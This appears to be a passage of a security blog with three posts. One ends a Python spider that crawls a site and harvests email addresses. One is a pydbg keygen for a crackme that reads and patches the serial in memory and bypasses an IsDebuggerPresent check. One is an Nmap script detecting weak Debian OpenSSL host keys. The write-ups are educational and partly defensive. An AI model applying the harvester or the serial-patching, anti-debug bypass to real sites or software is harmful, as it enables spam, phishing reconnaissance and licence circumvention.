        #TODO [8:-1] is just a heuristic, but too many misses shouldn't be bad... maybe?
        if self.url.endswith("/") and ("/" in self.url[8:-1]):
          self.url = self.url[:self.url.rfind("/", 0, -1)] + "/"
      dir = self.url[:self.url.rfind("/")] + "/"
      return dir + link
    return None

class SiteSpider:
  def __init__(self, searchList, scope=None, verbocity=True, maxDepth=4):
    #TODO maxDepth logic
    #necessary to add to this list to avoid infinite loops
    self.searchList = searchList
    self.emailList = []
    self.errors = {"decoding":0, "link":0, "parse":0, "connection":0, "unknown":0}
    if scope == None:
      try:
        urlre = re.search(r"(w+):[/]+([^/]+).*", self.searchList[0])
        self.scope = urlre.group(2)
      except AttributeError:
        raise Exception("URLFormat", "URL passed is invalid")
    else:
      self.scope = scope
    index = 0
    threshhold = 0
    while 1:
      try:
        PageSpider(self.searchList[index], self.scope, self.searchList, self.emailList, self.errors)
        if verbocity:
          print self.searchList[index]
          print " Total Emails:", len(self.emailList)
          print " Pages Processed:", index
          print " Pages Found:", len(self.searchList)
        index += 1
      except IndexError:
        break
      except KeyboardInterrupt:
        break
      except:
        threshhold += 1
        print "Warning: unknown error"
        self.errors["unknown"] += 1
        if threshhold >= 40:
          break
        pass
    garbageEmails =   [ "help",
                        "webmaster",
                        "contact",
                        "sales" ]
    print "REPORT"
    print "----------"
    for email in self.emailList:
      if email not in garbageEmails:
        print email
    print "nTotal Emails:", len(self.emailList)
    print "Pages Processed:", index
    print "Errors:", self.errors

if __name__ == "__main__":
  SiteSpider(sys.argv[1].split(","))

pydbg reverseme solution

Last week I wrote a keygen here.

This is an almost identical problem, but the binary has been patched to allow debugging (I may do this programmaticly as well, but not yet). I wanted to solve this with programmatic debugging. Here is the exe:
Ice9pch3.

The code simply sets a breakpoint and prints the key to the screen. Also it patches the process memory so that the serial is valid.

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:fullpathice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    valid_str = ""
    #the valid serial is at 004030C8
    addr = 0x004030C8
    while 1:
        tmp = mdbg.read(addr, 1)
        addr += 1
        if tmp != "x00":
            valid_str = valid_str + tmp
        else:
            break
    print "The valid string is: ", valid_str
    print "Writing this to memory..."
    #write this to memory at 004030b4
    #def write (self, address, data, length=0)
    wdata = ctypes.create_string_buffer(valid_str)
    mdbg.write(0x00403198, wdata, len(valid_str))
    #checking the write
    #print mdbg.read(0x00403198, len(valid_str) + 1)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#at 004011FF in execution, 
#def bp_set (self, address, description="", restore=True, handler=None):
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Updated solution. I change a register now to circumvent the isdebuggerpresent call.

import sys
import ctypes

from pydbg import *
from pydbg.defines import *


print "This is a very stupid keygen that uses a debug method and grabs the key from memory"
print "prints out the valid key, and writes it to memory"
print "Basically, pydbg 'hello, world'"
print "-------------"

if len(sys.argv) != 2:
    print "Error. USAGE: keygen.py C:fullpathice"
    sys.exit(-1)

def handler_breakpoint(mdbg):
    if mdbg.get_register("EIP") == 0x004011F5:
        valid_str = ""
        #the valid serial is at 004030C8
        addr = 0x004030C8
        while 1:
            tmp = mdbg.read(addr, 1)
            addr += 1
            if tmp != "x00":
                valid_str = valid_str + tmp
            else:
                break
        print "The valid string is: ", valid_str
        print "Writing this to memory..."
        #write this to memory at 004030b4
        #def write (self, address, data, length=0)
        #wdata = ctypes.create_string_buffer(valid_str)
        mdbg.write(0x00403198, valid_str, len(valid_str))
        #checking the write
        #print mdbg.read(0x00403198, len(valid_str) + 1)
    if mdbg.get_register("EIP") == 0x40106e:
        mdbg.set_register("EAX", 0)
    return DBG_CONTINUE

dbg = pydbg()
dbg.set_callback(EXCEPTION_BREAKPOINT, handler_breakpoint)
dbg.load(sys.argv[1])
dbg.debug_event_iteration()
#0x40106e is the point where we can circumvent the isdebugger present call
dbg.bp_set(0x40106e)
#at 004011FF in execution, 
#breakpoing for reading writing final compare
dbg.bp_set(0x004011F5)
dbg.debug_event_loop()

Nmap script to detect Debian OpenSSL Random Number Generator Weakness

This relies on HD’s keys, found http://digitaloffense.net/tools/debian-openssl/

description = [[
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
]]

---
-- @output
-- 22/ssh open  ssh
-- |_ ssh_debian_weak: The following keys are vulnerable: 2048 RSA 1024 RSA

-- SSH Weak Debian Key Script
-- rev 1.0 (2010-02-07)
-- rougly based on ssh_debian_weak.nasl by tennable
-- written by hand

author = "Rich Lundeen <mopey@webstersprodigy.net>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"websters", "nessus", "act_gather_info"}

dependencies = {"ssh-hostkey"}

require("shortport")
require("ssh1")
require("ssh2")
require("nessus/nessus_conf")
portrule = shortport.port_or_service({22}, {"ssh"})

action = function(host, port)
  local keyval = nmap.registry.sshhostkey[host.ip]
  if keyval == nil then
    return
  end
  local output = ""
  for i,line in ipairs(keyval) do
    --TODO eventually binary search is nicer, but due to formats ready from HD
    --or if wanted later perhaps add the hex version to registry
    local linekey = string.gsub(ssh1.fingerprint_hex(line.fingerprint, 
                                line.algorithm, line.bits), ":", "")
    local crimp = pcre.new("^[^\s]+[\s]([^\s]+)[\s][^\s]+", 0, "C")
    local s, e, t = crimp:exec(linekey, 0, 0)
    linekey = string.sub(linekey, t[1], t[2])
    local fstring = (nessus_conf.nessus_conf["basedir"] .. 
                     "nselib/nessus/data/debian_weak_ssl/" .. 
                     line.algorithm:lower() .. "_" .. 
                     tostring(line.bits))
    local mfile = io.open(fstring, "r")
    for vulnkey in mfile:lines() do
      --TODO this could be made more efficient
      if string.find(vulnkey, linekey, 0) then
        output = output .. line.algorithm .. " " .. tostring(line.bits)
      end
    end
    mfile:close()
  end
  if output ~= "" then
    return output
  end
end

Follow

Get every new post delivered to your Inbox.